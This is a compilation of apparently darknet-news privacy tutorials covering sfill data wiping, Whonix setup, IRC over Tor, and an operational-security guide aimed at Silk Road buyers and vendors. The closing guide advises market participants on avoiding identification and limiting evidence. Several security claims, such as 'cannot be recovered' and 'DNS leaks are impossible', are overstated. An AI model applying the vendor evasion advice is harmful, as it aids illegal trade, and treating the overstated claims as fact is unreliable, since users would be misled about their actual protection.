How does data wiping work? The term “wiping” is actually a bit misleading, because wiping is not just the removal of data. Wiping software overwrites all sectors of a disk or partition, ensuring that none of the original raw data remains. Software generally overwrites this data with a combination of zeros and random numbers, produced by a random number generator. /dev/random is a random number generator in the Linux kernel. When read, it returns pseudo-random bits generated from environmental noise collected by device drivers. /dev/random and /dev/urandom are both commonly used to produce pseudo-random bits. However, /dev/urandom reuses bits in the internal entropy pool, allowing it to produce more bits more quickly. /dev/urandom is generally considered less secure than /dev/random; however, it is much faster and less resource-intensive. For something like cryptographic key generation, you would want to use /dev/random. For data wiping, however, the use of /dev/urandom is considered secure.
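You can watch the kernel CSPRNG at work from the shell. This quick sketch (Linux only) reads 16 bytes from /dev/urandom and prints them as hex; note that it returns immediately, which is exactly why wiping tools prefer /dev/urandom over the potentially blocking /dev/random:

```shell
# Read 16 bytes from the kernel CSPRNG and display them as hex.
# /dev/urandom never blocks waiting for entropy, so bulk reads are fast.
head -c 16 /dev/urandom | od -An -tx1
```

Running it twice will (with overwhelming probability) print two different byte strings.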
The wiping utility of my choice is sfill, a small command-line utility that is lightweight but very effective. It is part of the ‘secure-delete’ package, which is available in the repositories of Debian-based distributions. If you are wiping the primary hard drive in your computer, you will need to boot from a Linux live CD. You also need to locate the partition or disk you want to wipe (e.g. /dev/sda2). For this, you can use GParted or any partition editor. At this point, be sure to verify that you have identified the correct disk. Then run sfill from the command line, pointing it at a directory on the mounted filesystem you want to scrub (sfill wipes the free space of the filesystem containing that directory). The default parameters are secure, so you only need additional arguments if you want verbose mode or other options. The technical process used by the software is outlined in the sfill manpage. sfill first overwrites data with zeros; this is one pass. The next 5 passes overwrite the data with random data from /dev/urandom. After this, the data is overwritten with 27 passes of values defined by Peter Gutmann (the researcher behind the Gutmann wiping method). The next 5 passes again overwrite with data from /dev/urandom. After this process, temporary files are created to fill the inode space. Inode stands for “index node”; inodes are used to index the files on a partition. After all free space on the partition is filled, the temporary files are removed and the wiping is finished. At this point, the data wiping process is complete. You can now be confident that your data cannot be recovered.
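The overwrite principle sfill relies on can be demonstrated safely on a throwaway file. The sfill invocation in the comment below is illustrative only (the mount point is a placeholder; double-check your target before running anything destructive); the live commands just show that overwriting a file’s sectors destroys the original bytes:

```shell
# Hypothetical free-space wipe (run against a mount point; -v is verbose):
#   sfill -v /mnt/target
# The underlying overwrite principle, shown on a throwaway file:
printf 'secret data' > demo.txt
dd if=/dev/urandom of=demo.txt bs=512 count=1 conv=notrunc 2>/dev/null
grep -q 'secret data' demo.txt || echo 'original bytes are gone'
rm demo.txt
```

This is exactly what wiping tools do, just applied to every sector of the free space rather than one file.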
Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP. This makes it a safer way to access the Deep Web than just using Tor on your current operating system. Using Tor on a Windows operating system is especially discouraged because of the direct access that the NSA has to Microsoft’s systems and the information that Microsoft is willing to hand over to them.
Before using Whonix, it is helpful to understand how exactly it works. Whonix is made up of two parts. One solely runs Tor and acts as a gateway, aptly called Whonix-Gateway. The second part, which the user actually uses, is called the Whonix-Workstation. It is on a completely isolated network that only allows connections through Tor. Both parts run in their own virtual machines on your computer, and this keeps what you do contained within Whonix.
To start you will first want to download VirtualBox. This will allow you to create the virtual machines for running Whonix on your computer. Then download both Whonix-Gateway and Workstation. There are a couple download options and you can choose which one you think is best. It is also suggested that you verify the images using the Signing Key if you understand how to do so. If not, you may want to learn how with the guide on PGP encryption.
After installing VirtualBox, open up the program and just follow a few simple steps:
- Click File > Import Appliance…
- Click “Choose” and select the downloaded Whonix-Gateway.ova file.
- Click next and then “Import” without changing any of the settings.
- Wait for the progress bar to complete the import.
- Repeat those steps for the Whonix-Workstation.ova file.
- Now start both the Whonix-Gateway and Whonix-Workstation.
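If you prefer the command line, VirtualBox ships with the VBoxManage tool, which can script the same import. Sketched below as a helper script rather than run directly, since it needs VirtualBox installed and the downloaded .ova files in the working directory (the file names are the defaults from the download page; adjust paths as needed):

```shell
# Scripted equivalent of the GUI import steps, using VBoxManage.
# Assumes the .ova files are in the current directory.
cat > import-whonix.sh <<'EOF'
#!/bin/sh
VBoxManage import Whonix-Gateway.ova
VBoxManage import Whonix-Workstation.ova
VBoxManage startvm Whonix-Gateway
VBoxManage startvm Whonix-Workstation
EOF
chmod +x import-whonix.sh
```

Either route gets you to the same place: both VMs imported and running.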
For your first use you will have to go through a quick setup process and then wait for Whonix to search for and install any necessary updates. Keep in mind you will need to keep Whonix-Gateway running but you don’t actually use it for anything besides updating. You will conduct all your activities within the Whonix-Workstation virtual machine window.
Now you can use Whonix to browse in a safer and more secure way, all without having to make drastic changes to your computer.
Hey everyone! First off, thanks a lot to everyone at DeepDotWeb for allowing me to make this and many more posts to come! I really hope everyone on the website finds it useful! So, on to the tutorial. Tor, as we all know, is a network that routes your traffic through a chain of encrypted relays, not only allowing people to visit websites without leaving a trace of who they are, but also letting them tunnel everyday internet connections. Today, I will be focusing this tutorial on connecting to IRC networks via Tor. Keep in mind, I will be explaining this from complete start to end, as if you are just learning what Tor is.
The first thing you are going to need is obviously the latest version of Tor from the Tor website. It’s going to download an exe file for you to open and extract. Go ahead, and extract the files to a place where you are going to have easy access to it. I personally extract all the files to a folder on my Desktop so I can get to it at any time.
Now that you have Tor ready to go, you will see four folders and one file called “Start Tor Browser.exe”. All you have to do to get Tor started is run the “Start Tor Browser.exe”. You will then be greeted with a screen asking if you would like to just connect to the Tor network, or if you would like to configure how you connect to the Tor network. All you need to do is push the “Connect” button, and you will be directed to another screen that goes through the process of connecting to the network automatically.
Now that the setup screens are out of the way, your life will be much simpler; you won’t have to deal with them again. After those menus are closed, you will be greeted with a nice webpage that says you are configured to use Tor and ready to go! Feel free to click the “Test Tor Network Settings” button for a double check. That step is optional, but you absolutely should go up to the little “S” with an exclamation point on it, click it, and check the “Forbid Scripts Globally” option. This will protect you from accidentally leaking important information while browsing the internet.
Alright. Your Tor browser is now up and running. For the next steps, you must keep the Tor Browser open; if it is closed at any time, the connection will close. For this example, I will be using the HexChat IRC client. Finding an IRC server will be up to you, but a simple search on a directory website will surely get you some results. So first you will need to open up HexChat or your favorite IRC client and get to the settings and/or preferences area. From that menu, you will need to get to the “Networking” and/or “Proxy” section.
From this menu, you will need to enter the proxy settings for the connection. Using this example, the “Hostname” will need to be “127.0.0.1” or “localhost”; either one will work. The “Port” will need to be set to “9150”. The “Type” will be set to “Socks5”. And finally, “Use proxy for” will need to be set to “All Connections”. Breaking this down: the IRC client routes every connection through the SOCKS5 proxy that Tor exposes at 127.0.0.1 on port 9150, so all of your IRC traffic travels through Tor. After all this is entered, just hit the “OK” button.
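Before pointing the IRC client at the proxy, it’s worth sanity-checking that Tor’s SOCKS port is actually listening (9150 is the Tor Browser default; a standalone tor daemon listens on 9050 instead). A minimal sketch using nc, assuming it is installed; it prints a status line either way:

```shell
# Probe the Tor Browser SOCKS port; harmless either way.
# 9150 = Tor Browser default; standalone tor daemons default to 9050.
if nc -z 127.0.0.1 9150 2>/dev/null; then
  echo "Tor SOCKS port 9150 is listening"
else
  echo "port 9150 not reachable - is Tor Browser running?"
fi
```

If the port isn’t reachable, the IRC client’s connection attempts will simply fail, so this check saves some head-scratching.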
After this, all you need to do is add a server to connect to, select your usernames, decide whether to use SSL, and adjust other settings to your personal preferences. And that is it! You are now connected to an IRC server via Tor with Tor’s full encryption benefits! And this isn’t just for IRC: the same proxy settings work with pretty much anything that allows a proxy connection, such as Firefox, Chrome, Pidgin, FTP clients, PuTTY, and much more!
With that, I once again thank DeepDotWeb for allowing me to write for them, and I thank you, the reader, for reading this tutorial. I hope this helps you as much as it helps me, whether you are brand new to Tor or an old user such as myself!
In the wake of the Freedom Hosting exploit, I think we should reevaluate our threat model and update our security to better protect ourselves against the real threats that we face. So I wrote this guide in order to spark a conversation. It is by no means comprehensive. I only focus on technical security. Perhaps others can address shipping and financial security. I welcome feedback and would like these ideas to be critiqued and expanded.
As I was thinking about writing this guide, I decided to take a step back and ask a basic question: what are our goals? I’ve come up with two basic goals that we want to achieve with our technical security.
1. Avoid being identified.
2. Minimize the damage when we are identified.
You can think of these as our _guiding security principles_. If you have a technical security question, you may be able to arrive at an answer by asking yourself these questions:
1. Does using this technology increase or decrease the chances that I will be identified?
2. Does using this technology increase or decrease the damage (e.g., the evidence that can be used against me) when I am identified?
Obviously, you will need to understand the underlying technology to answer these questions.
The rest of this guide explains the broad technological features that decrease the chances we are identified and that minimize the damage when we are identified. Towards the end I list specific technologies and evaluate them based on these features.
First, let me list the broad features that I have come up with, then I will explain them.
1. Simplicity
2. Trustworthiness
3. Minimal execution of untrusted code
4. Isolation
5. Encryption
To some extent, we’ve been focusing on the wrong things. I’ve predominantly been concerned with network layer attacks, or “attacks on the Tor network”, but it seems clear to me now that application layer attacks are far more likely to identify us. The applications that we run over Tor are a much bigger attack surface than Tor itself. We can minimize our chances of being identified by securing the applications that we run over Tor. This observation informs the first four features that we desire.
===Simplicity===
Short of not using computers at all, we can minimize threats against us by simplifying the technological tools that we use. A smaller code base is less likely to have bugs, including deanonymizing vulnerabilities. A simpler application is less likely to behave in unexpected and unwanted ways.
As an example, when the Tor Project evaluated the traces left behind by the browser bundle, they found 4 traces on Debian Squeeze, which uses the Gnome 2 desktop environment, and 25 traces on Windows 7. It’s clear that Windows 7 is more complex and behaves in more unexpected ways than Gnome 2. Through its complexity alone, Windows 7 increases your attack surface, exposing you to more potential threats. (Although there are other ways that Windows 7 makes you more vulnerable, too.) The traces left behind on Gnome 2 are easier to prevent than the traces left behind on Windows 7, so at least with regard to this specific threat, Gnome 2 is desirable over Windows 7.
So, when evaluating a new technological tool for simplicity, ask yourself these questions:
Is it more or less complex than the tool I’m currently using?
Does it perform more or fewer (unnecessary) functions than the tool I’m currently using?
===Trustworthiness===
We should favor technologies that are built by professionals or people with many years of experience rather than newbs. A glaring example of this is CryptoCat, which was developed by a well-intentioned hobbyist programmer, and has suffered severe criticism because of the many vulnerabilities that have been discovered.
We should favor technologies that are open source, have a large user base, and a long history of use, because they will be more thoroughly reviewed.
When evaluating a new technological tool for trustworthiness, ask yourself these questions:
Who wrote or built this tool?
How much experience do they have?
Is it open source, and how big is the community of users, reviewers, and contributors?
===Minimal Execution of Untrusted Code===
The first two features assume the code is trusted but has potential unwanted problems. This feature assumes that as part of our routine activities, we may have to run arbitrary untrusted code. This is code that we can’t evaluate in advance. The main place this happens is in the browser, through plug-ins and scripts.
You should completely avoid running untrusted code, if possible. Ask yourself these questions:
Are the features that it provides absolutely necessary?
Are there alternatives that provide these features without requiring plug-ins or scripts?
===Isolation===
Isolation is the separation of technological components with barriers. It minimizes the damage incurred by exploits, so if one component is exploited, other components are still protected. It may be your last line of defense against application layer exploits.
The two types of isolation are physical (or hardware based) and virtual (or software based). Physical isolation is more secure than virtual isolation, because software based barriers can themselves be exploited by malicious code. We should prefer physical isolation over virtual isolation over no isolation.
When evaluating virtual isolation tools, ask yourself the same questions about simplicity and trustworthiness. Does this virtualization technology perform unnecessary functions (like providing a shared clipboard)? How long has it been in development, and how thoroughly has it been reviewed? How many exploits have been found?
===Encryption===
Encryption is one of two defenses we have to minimize the damage when we are identified. The more encryption you use, the better off you are. In an ideal world, all of your storage media would be encrypted, along with every email and PM that you send. The reason is that when some emails are encrypted but others are not, an attacker can easily identify the interesting emails. He can learn who the interesting parties you communicate with are, because those will be the ones you send encrypted emails to (this is called metadata leakage). Interesting messages are lost in the noise when everything is encrypted.
The same goes for storage media encryption. If you store an encrypted file on an unencrypted hard drive, an adversary can trivially determine that all the good stuff is in that small file. But when you use full disk encryption, you have more plausible deniability as to whether the drive contains data that would be interesting to that adversary, because there are more reasons to encrypt an entire hard drive than a single file. Also, an adversary who bypasses your encryption would have to cull through more data to find the stuff that is interesting to him.
Unfortunately, using encryption incurs a cost that the vast majority of people can’t bear, so at a minimum, sensitive information should be encrypted.
On a related note, the other defense against damage is secure data erasure, but that takes time that you may not have. Encryption is preemptive secure data erasure. It’s easier to destroy encrypted data, because you only have to destroy the encryption key to prevent an adversary from accessing the data.
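The "encryption is preemptive erasure" idea can be sketched with openssl (assumed installed, version 1.1.1 or later for the -pbkdf2 flag; the passphrase is a placeholder). Once the plaintext is deleted and the passphrase is forgotten, all that remains on disk is indistinguishable from noise:

```shell
# Encrypt a file, then delete the plaintext. "Destroying the key" now
# destroys access to the data, without needing to scrub the ciphertext.
printf 'sensitive notes' > plain.txt
openssl enc -aes-256-cbc -pbkdf2 -pass pass:demo-passphrase \
    -in plain.txt -out cipher.bin
rm plain.txt
# Recovery is only possible with the passphrase:
#   openssl enc -d -aes-256-cbc -pbkdf2 -pass pass:demo-passphrase -in cipher.bin
rm cipher.bin
```

Compare this with the multi-pass overwrites described earlier: destroying one small key is far faster than scrubbing gigabytes of data.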
Finally, I’d like to add a related non-technical feature.
===Behavior===
In some cases, the technology we use is only as safe as our behavior. Encryption is useless if your password is “password”. Tor is useless if you tell someone your name. It may surprise you how little an adversary needs to know about you in order to uniquely identify you. Here are some basic rules to follow:
Don’t tell anyone your name. (obv)
Don’t describe your appearance, or the appearance of any major possessions (car, house, etc.).
Don’t describe your family and friends.
Don’t tell anyone your location beyond a broad geographical area.
Don’t tell people where you will be traveling in advance (this includes festivals!).
Don’t reveal specific times and places where you lived or visited in the past.
Don’t discuss specific arrests, detentions, discharges, etc.
Don’t talk about your school, job, military service, or any organizations with official memberships.
Don’t talk about hospital visits.
In general, don’t talk about anything that links you to an official record of your identity.
===A List of Somewhat Secure Setups for Silk Road Users===
I should begin by pointing out that the features outlined above are not equally important. Physical isolation is probably the most useful and can protect you even when you run complex and untrusted code. In each of the setups below, I assume a fully updated browser / TBB with scripts and plug-ins disabled. Also, the term “membership concealment” means that someone watching your internet connection doesn’t know you are using Tor. This is especially important for vendors. You can use bridges, but I’ve included extrajurisdictional VPNs as an added layer of security.
With that in mind, here is a descending list of secure setups for SR users.
Starting off, I present to you the most secure setup!
A router with a VPN + an anonymizing middle box running Tor + a computer running Qubes OS.
Advantages: physical isolation of Tor from applications, virtual isolation of applications from each other, encryption as needed, membership concealment against local observers with VPN
Disadvantages: Qubes OS has a small user base and is not well tested, as far as I know.
Anon middle box (or router with Tor) + Qubes OS
Advantages: physical isolation of Tor from applications, virtual isolation of applications from each other, encryption as needed
Disadvantages: Qubes OS has a small user base and is not well tested, no membership concealment
VPN router + anon middle box + Linux OS
Advantages: physical isolation of Tor from applications, full disk encryption, well tested code base if it’s a major distro like Ubuntu or Debian
Disadvantages: no virtual isolation of applications from each other
Anon middle box (or router with Tor) + Linux OS
Advantages: physical isolation of Tor from applications, full disk encryption, well tested code base
Disadvantages: no virtual isolation of applications from each other, no membership concealment
Qubes OS by itself.
Advantages: virtual isolation of Tor from applications, virtual isolation of applications from each other, encryption as needed, membership concealment (possible? VPN may be run in VM)
Disadvantages: no physical isolation, not well tested
Whonix on Linux host.
Advantages: virtual isolation of Tor from applications, full disk encryption (possible), membership concealment (possible, VPN can be run on host)
Disadvantages: no physical isolation, no virtual isolation of applications from each other, not well tested
Tails.
Advantages: encryption and leaves no trace behind, system level exploits are erased after reboot, relatively well tested
Disadvantages: no physical isolation, no virtual isolation, no membership concealment, no persistent entry guards! (but can manually set bridges)
Whonix on Windows host.
Advantages: virtual isolation, encryption (possible), membership concealment (possible)
Disadvantages: no physical isolation, no virtual isolation of applications from each other, not well tested, VMs are exposed to Windows malware!
Linux OS by itself.
Advantages: full disk encryption (possible), membership concealment (possible)
Disadvantages: no physical isolation, no virtual isolation
Windows OS by itself.
Advantages: full disk encryption (possible), membership concealment (possible)
Disadvantages: no physical isolation, no virtual isolation, the biggest target of malware and exploits!
Assuming there is general agreement about the order of this list, our goal is to configure our personal setups to be as high up on the list as possible.
Thanks for your attention, and again I welcome comments and criticism.